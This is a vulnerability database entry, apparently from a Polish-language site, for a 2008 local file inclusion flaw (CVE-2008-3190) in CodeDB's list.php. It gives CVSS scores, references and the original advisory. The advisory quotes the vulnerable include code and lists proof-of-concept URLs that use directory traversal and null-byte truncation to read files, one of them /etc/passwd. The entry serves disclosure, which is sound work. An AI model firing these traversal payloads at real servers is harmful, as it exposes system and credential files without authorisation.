Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
CodeDB (list.php lang) Local File Inclusion Vulnerability
2008-07-16 / 2008-07-17
Credit:
cOndemned
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2008-3190
CWE:
Not in CWE
Ogólna skala CVSS:
6.8/10
Znaczenie:
6.4/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Częściowy
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Częściowy
############################################################################### # # Name : CodeDB (list.php lang) Local File Inclusion Vulnerability # Author : cOndemned # Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;* # ############################################################################### Source : // list.php 2. $lang = htmlspecialchars($_GET['lang']); // ok, but.... for what ? lol 7. if(file_exists('templates/'.$lang.'_middle.php')) // We'll have to cut off rest of filename & extension 8. include('templates/'.$lang.'_middle.php'); // Ekhm... pwned ;d Proof of Concept : http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00 http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00 http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00 EoF.
Referencje:
http://xforce.iss.net/xforce/xfdb/43761
http://www.securityfocus.com/bid/30227
http://www.milw0rm.com/exploits/6071
http://www.frsirt.com/english/advisories/2008/2105/references
http://secunia.com/advisories/31053
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top